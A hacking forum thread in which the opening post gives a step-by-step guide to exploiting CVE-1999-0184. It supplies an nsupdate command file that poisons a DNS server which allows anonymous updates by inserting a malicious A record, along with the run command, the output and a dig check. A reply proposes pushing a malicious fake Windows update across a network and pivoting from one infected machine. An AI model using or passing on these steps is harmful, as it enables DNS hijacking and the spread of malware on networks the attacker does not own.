Author Topic: Exploiting CVE-1999-0184 DNS Poisoning  (Read 2309 times)

0 Members and 1 Guest are viewing this topic.

Offline AnarchyAngel

  • Peasant
  • *
  • Posts: 50
  • Cookies: 1
  • mmmm beer
    • View Profile
Exploiting CVE-1999-0184 DNS Poisoning
« on: December 10, 2015, 02:12:33 am »
Yes this CVE is old, but I keep seeing it and there is no real tool or exploit guides available so I thought I would make one up right quick.

This "guide" is for Kali 2 and the basics of whats going on is the target DNS server allows anonymous DNS updates. The one tool we will need is nsupdate. If its not already on your system you can just run apt.
Code: [Select]
apt-get install dnsutilsNow we will need to start with a file that has all our commands in it. It should look something like this:
Code: [Select]
server 1.2.3.4 #our target DNS server
zone corp.company.com #the zone we are working in.
update delete evil.corp.company.com. A #rm just in case.
update add evil.corp.company.com. 86400 IN A 2.2.2.2
show
send
Save the file as dns. Now just run the following command:
Code: [Select]
nsupdate -v dns
nsupdate should read all the commands in the dns file and send them to our target DNS server. After a few seconds you should see something similar to this:
Outgoing update query:
Code: [Select]
;; ->>HEADER<<- i="" id:="" nbsp="" noerror="" opcode:="" status:="" update="">
;; flags:; ZONE: 0, PREREQ: 0, UPDATE: 0, ADDITIONAL: 0
;; ZONE SECTION:
;corp.company.com.  IN SOA

;; UPDATE SECTION:
evil.corp.company.com. 0 ANY A
evil.corp.company.com. 86400 IN A 2.2.2.2
Now just run a quick DiG query to make sure it worked.
Code: [Select]
dig @1.2.3.4 A evil.corp.company.com That is all I have for this post. Happy hacking :)

OP: http://aahideaway.blogspot.com/2015/12/exploiting-cve-1999-0184-dns-poisoning.html
https://dc414.org - MKE area DEFCON group

Offline Pandles7

  • NULL
  • Posts: 2
  • Cookies: 1
    • View Profile
Re: Exploiting CVE-1999-0184 DNS Poisoning
« Reply #1 on: February 29, 2016, 12:00:01 am »
Nice, I used another script-kiddie tool for this. I heard that you could fake an update to make all the windows computers on your network to download you malicious "update" - Pretty interesting, this could also be used if you've infected one machine and use it as a pivot to infect the rest of the network.